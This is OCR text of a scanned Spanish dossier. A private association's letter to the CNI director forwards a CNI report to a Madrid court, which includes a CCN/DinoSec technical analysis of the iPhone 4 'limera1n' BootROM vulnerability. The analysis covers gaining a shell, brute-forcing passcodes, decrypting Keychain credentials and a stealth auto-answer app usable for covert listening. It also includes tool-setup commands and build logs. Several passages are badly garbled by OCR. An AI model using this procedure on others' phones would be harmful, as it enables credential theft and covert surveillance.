Félix Sanz Roldán Secretario de Estado
ENTIDAD ASOC PARA LA Firmado digitalmente por ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS PREVENCION ESTUDIO ABUSOS NEGLIGENCIAS EN INFORMATICA CIF G80593254 - NOMBRE GALLARDO ORTIZ DELITOS ABUSOS MIGUEL ANGEL - NIF 07212602D Nombre de reconocimiento (DN): c=ES, NEGLIGENCIAS EN o=FNMT, ou=FNMT Clase 2 CA, ou=703015345, cn=ENTIDAD ASOC PARA INFORMATICA - CIF LA PREVENCION ESTUDIO DELITOS ABUSOS G80593254 - NOMBRE NEGLIGENCIAS EN INFORMATICA - CIF - NOMBRE GALLARDO ORTIZ GALLARDO ORTIZ MIGUEL G80593254 MIGUEL ANGEL - NIF 07212602D ANGEL - NIF 07212602D Fecha: 2016.11.07 19:57:52 +01'00'
director d el Centro N acional d e I nteligencia CNI Documento c on f irma digital en www.miguelgallardo.es/felixsanzroldan.pdf Hemos tenido acceso a una copia de su escrito de fecha 31.3.16 dirigido al Juzgado de al Centro Instrucción n° 2 de Madrid, que adjunto . Antes de cualquier otra consideración yo deseo confirmar que las 28 páginas de que consta son auténticas y que termina diciendo textualmente: Se puede ampliar cualquier punto del informe, utilizando c omo v ia p referente de c omunicación e l portal h ttp://www.ccncert.cni.es La asociación APEDANICA a la que desde 1992 tiene el máximo interés por ampliar ese i nforme, más aún c onsiderando los d ocumentos q ue también se adjuntan . La secretaria general del Centro Nacional de Inteligencia CNI, Beatriz Méndez de Vigo Montojo, tiene pendiente de resolver la solicitud de hace ya casi dos meses que puede verse p ublicada e n h ttp://www.cita.es/cniupm.pdf Nos preocupa que funcionarios públicos con cargos de dirección y dedicación completa en la Universidad Politécnica de Madrid UPM puedan administrar empresas que se benefician de convenios con el CNI, al mismo tiempo que el CNI contrata a empresas privadas para proporcionar lo que un juzgado le requiere. Son conocidas mis denuncias contra funcionarios empresarios ilegales en la Oficina de Conflictos de Intereses desde hace tiempo pero también quiero que se sepa que los funcionarios que se dedican a negocios es difícil que puedan dedicarse bien a sus funciones públicas, especialmente en tecnologías complejas. En definitiva, que unos se dediquen a lo que no se deben dedicar, mientras que no se dedican a lo que sí deberían dedicarse con mayor entrega y calidad de resultados. Pero repito que quiero reservar mis últimas opiniones “ad hoc” hasta que se me confirme que la documentación a djunta es a uténtica y completa, m ejor a ún s i s e amplía y actualiza. Ignoro hasta dónde puede proporcionar información sobre todo lo que adjunto, pero sea c ual s ea en cada m omento a gradeceré q ue se a mplíe y a ctualice a l m áximo . Dr. (PhD) M iguel Gallardo , Tel. 902998352 Fax: 902998379 apedanica.org@gmail.com Asociación APEDANICA C/ Fernando Poo 166ºB E28045 Madrid, SPAIN (ESPAÑA)
Se a djuntan l os d ocumentos que t ambién p ueden v erse en I nternet
http://www.cita.es/cniiphone.pdf http://www.cita.es/juzgadoiphone.pdf http://www.cita.es/habeassmartphone.pdf http://www.miguelgallardo.es/fcccomplaint.pdf
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
MINISTERIO
CENTRO NACIONAL
DE LA PRESIDENCIA
o
F
I
C
I
DE INTELIGENCIA
Ver nota al final en relación a http://www.cita.es/juzgado-iphone.pdf
O
S/REF.: N/REF.: lAO-C/
FECHA:
3
1
33 7'/
de marzo de 2016
ASUNTO: OIUGENCAS PREVIAS PROC. ABREVIADO 4676/2014
ANEXO: INFORME DEL CENTRO CRIPTOLÓGICO NACIONAL
DESTINATARIO: JUZGADO DE INSTRUCCIÓN N° 2 DE MADRID
)
Mediante oficio de i de febrero de 2016, con entrada en este Centro Nacional de Inteligencia (CNI) el 3 de febrero de 2016, el Juzgado de Instrucción n° 2 de Madrid, exhortó al Centro Criptológico Nacional, cuya dirección ostento en virtud de lo dispuesto en el artículo 9.2.0 de la Ley I 1/2002, de 6 de mayo, reguladora dei CNI, a realizar el correspondiente informe en relación con ei disco duro que se acompañaba con el contenido de las extracciones del terminal telefónico IPHONE 4 con IMEI 012837000896838. En su virtud, por medio del presente, se remite ei informe solicitado al Centro Criptológico Nacional con toda la información detectada, tanto activa como borrada, y su correspondiente análisis.
o DE ESTADO DIRECTOR
?r. .
.
'
Sanz Roldán -
.
%
RREO ELECTRÓNIC Dr. (PhD)
Ing. Miguel Gallardo
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy ofAvda. CVISION PDFCompressor Padre HUId00 S/fl
j
,Sn
IAflOTD
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limerain' en el ¡Phone 4 CCN
y DinoSec
AUTOR/ES:
Dr. (PhD) Ing. Miguel Gallardo
¿Dato personal del perito? Ver RAÚL SILES (DINOSEC) http://www.cita.es/sentencia.pdf RAUL@DINOSEC.COM www.miguelgallardo.es/malversado.pdf
FECHA:
16 DE FEBRERO DE 2016
VERSIÓN:
1.0
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
..14 Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limera in' en el iPhone 4
Contenido i.
2.
Resumen ejecutivo ......................................................................................................................... 4
Introducción
explotación ................................................................................................. 10
3.
Entorno de análisis
4.
Preparación dei portátil para explotar la vulnerabilidad
y
5 4.1
13
Instalación ........................................................................................................................... 14
4.1.1
Xcode .............................................................................................................................. 14
4.1.2
LDID
4.1.3
Herramienta codesign_allocate ...................................................................................... 15
4.1.4
Homebrew
4.1.5
Swigyopenssl ................................................................................................................. 15
4.1.6
Enlace simbólico
4.1.7
Instalación de módulos de Python
4.1.8
Redefinir la ubicación de Xcode ...................................................................................... 16
4.2
......................................................................................................................
a
"/usr/include" desde Xcode
15
.............................................................
15
.................................................................................
16
Preparación del exploit para un modelo de dispositivo móvil iOS concreto
......................
17
........................
17
4.2.1
Asegurarse de que se han aceptado los términos de licencia de Xcode
4.2.2
Descargar las iPhone Data Protection Tools para OS X Yosemite ................................... 17
4.2.2.1
Descarga directa (opción 1) ........................................................................................ 17
4.2.2.2
Descarga mediante Git (opción 2)
4.2.3
5.
.............................................................
18
Ejecutar el script "build.py" para el dispositivo móvil iOS objetivo ................................ 18
Proceso de explotación de la vulnerabilidad
5.1
..............................................................................
Explotación de la vulnerabilidad
................................................................................
23
.........................................................................................
23
5.1.1
Conexión del dispositivo móvil al ordenador ................................................................. 23
5.1.2
Apagar el dispositivo móvil
5.1.3
Ejecutar el script de arranque "boot.py': redsn0w
5.1.4
Arrancar el dispositivo en modo DFU ............................................................................. 25
5.2
y
cerrar iTunes
....................................................................
........................................................
Capacidades disponibles una vez explotada la vulnerabilidad
...........................................
23
23
28
5.2.1
Acceso al dispositivo móvil mediante SSH ...................................................................... 28
5.2.2
Ataques de fuerza bruta sobre el código de acceso del dispositivo móvil
5.2.3
Descifrando las credenciales almacenadas en el Keychain del dispositivo móvil ........... 32
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
.....................
30
Page 2
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limerain' en el ¡Phone 4
5.2.4
Potencial instalación de aplicaciones en el dispositivo móvil ......................................... 33
5.2.5
Acceso
5.3
a
todos los datos almacenados en el dispositivo móvil ...................................... 33
Reinicio del dispositivo móvil tras explotar la vulnerabilidad ............................................. 34
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
perito judicial investigador
Page 3
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4
2.
Introducción
presente informe refleja los resultados de un análisis técnico asociado a la vulnerabilidad conocida como 'limerain' presente en el BootROM de los dispositivos móviles de Apple basados en el núcleo o SoC (System on Chip) modelo A4, como por ejemplo el iPhone 4 (junio de 2010), el iPad (abril de
El
i
2010), el iPod Touch de 4 generación o el Apple TV de 2 generación (ambos de septiembre de 2010)2. El SoC A4 fue fabricado y comercializado por Apple a partir de marzo de 2010:
El
análisis técnico, y el presente informe asociado, ha sido efectuado por Raúl Siles (DinoSec), consultor
de seguridad, actuando en colaboración con el CCN (Centro Criptológico Nacional), durante el mes de
febrero de 2016. EI
análisis se llevó
a
cabo con el objetivo de verificar si sería posible disponer de control completo
sobre un dispositivo móvil iOS de Apple, modelo ¡Phone 4 (identificado como "Model A1332"3 y con FCC-ID = BCG-E2380B4), si se dispone de acceso físico al mismo, ratificándose que debido a la
vulnerabilidad mencionada, El
es
posible disponer de dicho acceso.
BootROM5 es el componente que contiene el primer fragmento de código relevante que es
ejecutado durante el proceso de arranque de los dispositivos móviles de Apple. Dicho código reside en una memoria de sólo lectura, como su propio nombre indica (ROM, Read Only Memory). 57446, asociadas al SoC A4, vulnerabilidad 'limeraln' afecta a las versiones de BootROM hasta la conocido como el modelo S5L89307. Esta vulnerabilidad y el exploit asociado fueron publicados el 9 de octubre de 2010 por el investigador George Hotz (geohot), y afectan también a versiones previas de SoCs de Apple, como por ejemplo los empleados en el ¡Phone 3GS y en el iPod Touch de 3 generación (también basados en la arquitectura ARMv7). El nombre de la vulnerabilidad y el exploit La
asociado provienen del nombre de la primera herramienta que hacía uso de estos para llevar a cabo el proceso de jailbreak en los dispositivos móviles de Apple: limeraln8. El exploit ha sido también
2
http://iossupportmatrix.com referencia numérica dei modelo de iPhone está disponible en 4 https://www.fcc.gov/general/fcc-id-search-page (Grantee code https://www.theiphonewiki.com/wiki/Bootrom 6 https://www.theiphonewiki.com/wiki/Bootrom_574.4 7 https://www.theiphonewiki.com/wiki/55L8930 8 https://www.theiphonewiki.com/wiki/Limeraln 3
La
:
la
parte posterior del mismo. Product code: -E2380B)
BCG,
5
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
perito judicial investigador
Page 5
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limerain' en el iphone 4
Adicionalmente se conoce la existencia de otro exploit que sólo afecta al SoC A4 de Apple, y por tanto, también al dispositivo móvil bajo estudio. Este otro exploit, denominado SHAtter16, nunca ha sido utilizado por parte de las herramientas públicas que permiten llevar a cabo el proceso de jailbreak en los dispositivos móviles de Apple, ya que el exploit de 'limerain' fue publicado en primer lugar y afectaba
a
un mayor número de dispositivos.
que la vulnerabilidad conocida como 'limerain' afecta al hardware del dispositivo, en concreto al BootROM, no es posible solucionarla mediante actualizaciones software, siendo necesario
Debido
a
actualizar el hardware del dispositivo, es decir, de manera efectiva, sustituir el dispositivo por un modelo más nuevo basado en otra versión de SoC no vulnerable. Asimismo, debido a que se trata de una vulnerabilidad hardware, permite su explotación independientemente de la versión software de
operativo móvil de Apple) instalada en el dispositivo móvil. Por tanto, se han visto afectadas por esta vulnerabilidad tanto las versiones de iOS empleadas originalmente por los primeros dispositivos vulnerables, como iOS 3.2.2 en el iPad 1, hasta las últimas versiones soportadas por los lOS (el sistema
dispositivos vulnerables, como lOS 7.1.2 en el iPhone 4. Tras explotar la vulnerabilidad
'limerain',
se dispone de plenas capacidades para
modificar y alterar
el funcionamiento del dispositivo móvil objetivo. Sería por tanto posible realizar las modificaciones deseadas para cambiar el comportamiento estándar del dispositivo móvil y, por ejemplo, añadir nuevas capacidades para que el mismo responda automáticamente algunas llamadas recibidas, por
ejemplo, en función del número llamante. Existen aplicaciones móviles (apps) como AutoAnswer17 que disponen de estas capacidades. Esta app está disponible desde Cydia (un repositorio público de apps para lOS) para dispositivos móviles iOS con el jailbreak aplicado, y permite responder automáticamente tanto
a las
llamadas de voz
a
través
de la red de telefonía o celular, como a las llamadas de voz y vIdeo conferencia a través de FaceTime. AutoAnswer es compatible con las versiones iOS 4, 5, 6 y 7, es decir, con la versión instalada en el
iPhone 4 bajo
estudio'8.
AutoAnswer permite seleccionar los números Ilamantes (hasta tres) para los que el teléfono responderá las llamadas automáticamente sin la intervención del usuario (y potencialmente, para cualquier número), así como definir si la llamada será respondida inmediatamente o tras un tiempo determinado (especificado en segundos en la configuración de la app). Adicionalmente, la app dispone de un modo silencioso (o Stealth Mode) para que el teléfono no emita ningún sonido asociado a la llamada entrante, de forma que el usuario no sea consciente de la misma, no mostrándose ni siquiera que hay una llamada activa, y no dejando registro en el histórico de llamadas recibidas. La descripción de la app en inglés detalla varios de sus diferentes casos de uso:
"AutoAnswer has several uses like: baby-watching over FaceTime, auto-answering specific numbers while driving, while using your phone with a bluetooth headset, instant response to 16 17
la
https://www.theiphonewiki.com/wiki/SHA-1_ImageSegment_Overflow http://moreinfo.thebigboss.org/moreinfo/clepiction.php?fileautoanswerData Adicionalmente existe una versión para lOS 8: http://moreinfo.thebigboss.org/moreinfo/autoanswer.php
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
Page 7
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limerain' en el iphone 4
651 -234ML
Perhaps the most powerful of this application.
option-
if enabTéd, thé
phone does flot ting at aIftheuser Unaware of the autoatswered call and the cati is not written to call history. The phoneanswers in
is
the backgthund without showing that
asaD is
active,,
andyou can
hear I mónitor the remote area or view the remove camera via FaceTImeXes, it also auto answers Fac-eTime calls «ree of charge in most ar?as)Note that -
unless the caller mutes the
vola
mk.
be heard on the answering phone Side hislher
niight
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
Page 9
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4
.ttw d -J
2OI
Ob
Pw
AcWa.ór
aza
,steF.-,
s.
tao
ebb_F
I
JZZ
fX
ste>
,eh_
. e,
>
eb5eer
r4e
h-
fo?r,eci &aeece
s
rsççnlmeflátd br M Aped
dCOfle;4do de ,,&r4ad
be
ceta attuebzjc.S. conebte. .. Más
de Remcde Deektep CebÌt The
384 seSaM
ft' -m5M
PeeMbe ebosts
a
5 edárebseS seserd sbus; ro'atgfl to tebC
Feb & 2b1C
V i'
Teces
et
Verebs12&2
'.
esM
.
tsMee.do M Feb & 2010
t
o
,
-
t
'
-::.'
\/
,s
ACtCstdsCtO - S Cscttánads de
MetMado et Fob 4 2018
St
2015 ISSeCS i
.5
s35
s-
ed
t
óflL. to
't--t s-
-'
OS X LasCtuCtt 5eb,deOSXYoscnt.telOI, rtc,o stessi stedob OC 555545.
veos1Oto
5555e55t
i
.
á
bt.i
1045545 d5Ceb5555Y5CbDÇ. eMCee 55 pew.s5sC
t
VSt!5905
t
555 hSC5C
E5V at ce 's:5
aSepsie
S
t
Tste
t5s-5--4- 5 te5d5
? &5
referencia en los ficheros de firmware de iOS asociada al modelo de iPhone 4 A1332 en las diferentes versiones de hardware es iPhone3,1 o iPhone3,221. La
Todas las pruebas realizadas han hecho uso de dispositivos móviles de Apple modelo Phone 4 (A1332) con la versión 7.1.2 de iOS, al ser esta la versión existente en el dispositivo móvil iPhone 4 de referencia
que ha originado el presente análisis. Es
posible verificar
la
versión de BootROM del dispositivo móvil objetivo arrancándolo en modo DFU
(Device Firmware Update), mediante un proceso de arranque personalizado que permite restaurarlos
dispositivos móviles de Apple22: 1.
Conectar el dispositivo móvil al ordenador mediante un cable USB.
2.
Apagar el dispositivo móvil.
3.
Esperar
4.
5.
Arrancar el dispositivo móvil manteniendo pulsado el botón de arranque (o botón de encendido y apagado) durante 3 segundos. Pulsar el botón de arranque y de "Home" simultáneamente durante 10 segundos.
6.
Soltar el botón de arranque pero mantener pulsado el botón de "Home".
7.
Después de unos 15 segundos, iTunes indicará que ha detectado un dispositivo en modo
a
que el dispositivo móvil se apague completamente.
recuperación. La
21 22
pantalla del dispositivo permanecerá en blanco (de color negro), sin ningún logotipo o imagen.
https://www.theiphonewiki.com/wiki/Models https://www.theiphonewiki.com/wiki/DFU_Mode
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
Page 11
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 9imeraln' en el iphone 4
4. Preparación dei portátil para explotar la vulnerabilidad El
siguiente procedimiento permite configurar el entorno necesario en
explotar
la
OS X
Yosemite (1O.1O.x) para
vulnerabilidad 9imeraln' sobre dispositivos móviles de Apple vulnerables.
Para ello es necesario instalar diferentes herramientas y utilidades, junto a sus prerrequisitos software, así como el entorno de desarrollo de Apple, conocido como Xcode. Adicionalmente se hará uso de las iPhone Data Protection Tools23, un conjunto de utilidades que permiten demostrar el
potencial del exploit de 9imeraln', tanto para obtener acceso completo al dispositivo mediante un shell (o línea de comandos), asícomo poder realizar ataques de fuerza bruta sobre el código del acceso
fijado en el dispositivo móvil. Una vez obtenido el código de acceso, es posible descifrar el Keychain, qué proporciona acceso a todas las credenciales (usuarios y contraseñas) y certificados del usuario, así como el contenido completo de la memoria del dispositivo móvil y acceder a la totalidad del sistema de archivos (incluyendo todos los ficheros y directorios). Los scripts de gestión del Keychain24 pueden ser instalados en cualquier dispositivo móvil iOS con el proceso de jailbreak aplicado para
inspeccionar los elementos almacenados en el Keychain, así como sus clases de protección25.
Adicionalmente, estas herramientas tienen capacidades para descifrar los backups de iTunes ('tbackup_tool.py") y para crear imágenes ramdisk del dispositivo móvil objetivo desde el punto de vista forense ('dumpdata_partition.sh). Por otro lado, una versión modificada de HFSExplorer
permite hacer uso de la imagen ramdisk creada previamente para procesar las imágenes de las particiones de la memoria de los dispositivos móviles iOS. Para finalizar, en una actualización posterior emf_decrypter.py", que permite descifrar las imágenes de disco se añadió la utilidad
permanentemente y la utilidad "emf_undelete.py", que permite que no han sido aún sobrescritos. Para llevar
a
es necesario
la
recuperación de ficheros borrados
cabo varios de los pasos descritos en el proceso de preparación detallado
a
continuación,
disponer de conectividad hacia Internet desde el equipo de análisis.
Todos los comandos indicados a continuación deben ser ejecutados por un usuario con privilegios de
administrador en OS X, para que pueda ejecutar comandos como root mediante sudo en aquellos casos donde es necesario. Una vez se dispone del portátil preconfigurado, es posible hacer uso del exploit de
limerain'
directamente, siguiendo las instrucciones del apartado "5. Proceso de explotación de
la
vulnerabilidad.
23
https://code.googe.com/archive/p/iphone-dataprotection/ En ocasiones referenciados como utilidad KeychainViewer. 25 https://www.apple.com/la/iphone/business/docs/iOS_security_Mayl2.pdf 24
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
Page 13
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 9imeraln' en el iPhone 4
$
sudo mkdir -p /usr/local/bin curl -O http://networkpx.googlecode.com/files/ldid chmod +x idid sudo cp idid /usr/local/bin
El
hash SHA1 de Idid es: 27bc747804aaec28795a017b85254d2bc7de6132.
s s s
herramienta codesign_allocate es utilizada por las iPhone Data Protection Tools, por lo que también debe estar disponible en el PATH. La herramienta codesign_allocate está incluida en Xcode versión 5.1.1 y está disponible por defecto en el PATH bajo La
hh/usr/binu:
which codesign allocate /usr/bin/codesign allocate
s
Se
instaló el gestor de paquetes Homebrew en
s
ruby -e "$(curl -fsSL
OS X
(por defecto, bajo /usr/local/bin/brew'):
https://raw.githubusercontent.com/Homebrew/install/master/install)"
Mediante el siguiente comando se procedió a inicializar Homebrew (se obtiene un mensaje de aviso indicando que la versión de Xcode utilizada está desactualizada): $
brew doctor
NPEUIitMI herramienta swig, en concreto la versión 3.0.8, necesaria para de Python posteriormente, como por ejemplo, M2crypto:
Se
instaló
s
brew install swig
la
la instalación de
módulos
instaló openssi, en concreto la versión 1.O.2f, necesaria para la instalación de módulos de Python posteriormente, como por ejemplo, M2crypto:
Se
$
brew install openssl
.
-AfifTflrIfflT
"/usr/includ&' asociado al mismo directorio en Xcode, necesario para instalación de módulos de Python posteriormente, como por ejemplo, M2crypto: Se
creó un enlace simbólico
s
sudo ln -s
a
la
/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/DevelO per/SDK5/NacOSX1O.09.sdk/usr/include/ /usr/include © 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
Page 15
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limera in' en el iPhone 4
w_
:
_.L,) trw
ii w
iw
5
r:
F
si
Fflhs
.íi
ii
i
i
i
i i
ni. F
flT !'T
I
i
sIs1 fl
ti
iinti1 UtS
I(s
permiten preparar el ordenador empleado para el análisis con el objetivo de explotar un modelo de dispositivo móvil iOS de Apple específico. Estos pasos son, por tanto, necesarios y deben ser repetidos para poder explotar cada modelo de dispositivo móvil diferente, es decir, deben repetirse para el ¡Phone 4, para el iPad i, etc. En el caso de estudio analizado, todos los pasos mostrados aplican únicamente al iPhone 4 al ser este el dispositivo móvil objetivo. Los siguientes pasos
Para ello sólo es necesario ejecutar el siguiente comando, visualizar los términos de licencia y teclear
"agree" para aceptarlos: sudo xcodebuild -license
s
I:t
Descargar la versión específica de las ¡Phone Data Protection Tools para Yosemite y Xcode 5.x,
existiendo dos opciones: mediante descarga directa (opción recomendada desde el punto de vista forense) o mediante Git. Protection Tools, también conocidas como iDPT, toman su nombre del término "data protection" (o "protección de datos" en español), empleado porApple para referirse a los mecanismos de protección de datos y cifrado de ¡OS. Estas herramientas fueron originalmente publicadas en http://code.google.com/p/iphone-dataprotection/, junto a la presentación asociada de la conferencia Hack in the Box, HitB, del año 2011 en Amsterdam por Sogeti/ESEC29.
Las iPhone Data
t
ritt1WrIiQW .
Desde el punto de vista forense, se pueden descargar las iPhone Data Protection Tools directamente
desde el fichero ZIP asociado, en lugar de mediante Git,
a
través de
la
siguiente URL:
cd $HOME/Downloads s curl -LOJ https://github.com/dinosec/iphone-dataprotectionxcode5/archive/l O i zip s
.
La
.
.
descarga creará el fichero "iphone-dataprotection-xcode5-i.O.i.zip". Se debe crear un directorio
de trabajo y copiar las iPhone Data Protection Tools al mismo:
s
mkdir $HOME/iDPT
s
cd $HOME/iDPT
s s
29
unzip $HOME/Downloads/iphone-dataprotection-xcode5-1 .0 .l.zip mv iphone-dataprotection-xcode5-1 O i iphone-dataprotection .
.
http://conference.hackinthebox.org/hitbsecconf2ûllams/materials/D2T2%20-%2OJean-
Baptiste%2OBe%cC%8ldrune%20&%2OJean%2OSigwald%20-%2OiPhone%2OData%2OProtection%2Oin%2ODepthpdf
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
Page 17
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4
inflating: inflating: inflating: inflating: inflating: inflating:
redsnüwmacO inflating: inflating: inflating: racoon tar extracting: creating: inflating:
redsnOwmacO.9.15b3/redsnOw.app/Contents/MacOS/bootlogo.png redsnOwmacO.9.15b3/redsnOw.app/Contents/NacOS/bootlogox2.png redsnOwmacO.9.15b3/redsnüw.app/Contents/MacOS/corona-A5.tar redsnOwmacO.9.15b3/redsnüw.app/Contents/MacOS/Cydia.tar.lzma redsnOwmacO.9.l5b3/redsnOw.app/Contents/MacOS/Keys.plist 9 l5b3/redsnOw app/Contents/MacOS/progresslogo png redsnOwmacO.9.l5b3/redsnOw.app/Contents/MacOS/rd.tar redsnOwmacO 9 l5b3/redsnOw.app/Contents/MacOS/redsnOw redsnOwmacO.9.l5b3/redsnOw.app/Contents/MacOS/rocky.
.
.
.
.
.
.
redsnOwmacO
redsnüwmacO.9.15b3/redsnüw.app/Contents/Pkglnfo redsnOwmacü.9.l5b3/redsnüw.app/Contents/Resources/
9 l5b3/redsnüw app/Contents/Resources/redsnOw icns Decrypting kernelcache.release.n90 Unpacking ... Doing CSED patch Doing getxattr system patch Doing nand-disable-driver patch Doing taskforpidO patch Doing IOAES gid patch Doing AMFI patch Doing AppleIOPFMI: :fmiPatchMetaFringe patch Doing PEicanhasdebugger patch Doing IOAESAccelerator enable UID patch Added IOFlashControlleruserClient::externalMethod patch at file offset 0x5f08f4 Patched kernel written to data/boot/kerneliPhone3, 15. 09A334 .patched Decrypting 0l8-7923-347.dmg Decrypted ramdisk written to data/boot/ramdiskiPhone3, l5.09A334 .dmg Rebuilding ramdisk tools Found iOS SDK at /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Deve loper/SDKs/iPhoneOS7 1 sdk/ lOKit headers missing Symlinking headers .
.
.
+
.
.
.
sudo ln -s
/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Develo per/SDK5/MacOSXlO 9 sdk/System/Library/Frameworks/IOKit framework/Headers /Applications/Xcode app/Contents/Developer/Platforms/iPhoneOS platform/Deve loper/SDK5/iPhoneOS7 1 sdk//System/Library/Frameworks/IOKit framework/Heade .
.
.
.
.
.
.
.
rs
Password: + sudo ln -s /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Develo per/SDK5/MacOSXlO 9 sdk/usr/include/libkern/OSTypes .h /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneüS .platform/Deve loper/SDK5/iPhoneOS7 1 sdk//usr/include/libkern/OSTypes .h + set +x .
.
.
.
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
Page 19
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
s
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4
min=4 O -o ioflashstoragekit ioflash/ioflash. c ioflash/ioflashkernel .0 ioflash/ioflashstoragekit.c ioflash/IOFlashPartitionScheme.c util.c codesign -s - --entitlements entitlements.plist ioflashstoragekit clang -arch armv7 -Wall -Wno-pointer-sign -isysroot /Appiications/Xcode app/Contents/Developer/Platforms/iPhoneOS platform/Deve loper/SDKs/iPhoneOS7.1.sdk/ -DHGVERSION="\"unknown\" -03 -I. -framework CoreFoundation -framework lOKit -framework Security -miphoneos-versionmin=4.O -o ttbthingy ttbthingy.c codesign -s - --entitlements entitlements.plist ttbthingy Non-fat file: ramdisktools/restoredexternal is architecture: armv7 resizing ramdisk... hdiutil will segfault if ramdisk was already resized, thats ok Attaching ramdisk /dev/disk2 /Volumes/ramdisk Unpacking ssh.tar.gz on ramdisk... bin!: Already exists bin!cat: Already exists bin,/launchctl: Already exists bin!ln: Already exists bin!mkdir: Already exists bin!mv: Already exists bin/'rm: Already exists etc!: Already exists shin!: Already exists usr!: Already exists usr!bin!: Already exists usr!lib!: Already exists var,': Already exists tar: Error exit delayed from previous errors. This tar error message is okay Adding!updating ramdisktools binaries on ramdisk... total 568 204B 14 feb 21:45 drwx ------ 6 usuario staff l7OB 14 feb 21:45 .. drwxr-xr-x 5 usuario staff 104K 14 feb 21:45 bruteforce -rwxr-xr-x 1 usuario staff staff 103K 14 feb 21:45 device infos -rwxr-xr-x 1 usuario 65K 14 feb 21:45 ioflashstoragekit -rwxr-xr-x 1 usuario staff 5l4B 14 feb 21:45 mount partitions.sh -rwxr-xr-x 1 usuario staff "disk2" unmounted. "disk2" ejected. Build OK, running boot.py Using data!ipsw!iPhone3, 15. O9A334Restore.ipsw Use nand-disable boot flag ? [y!n] n .
.
.
NOTA: Los errores asociados al mensaje "no repositoryfound" y "(.hg
ejecución del script asociado, "build_tools.sh", y se deben
a
a la
que la versión utilizada de las iPhone Data
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
notfound)" no afectan
Page 21
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
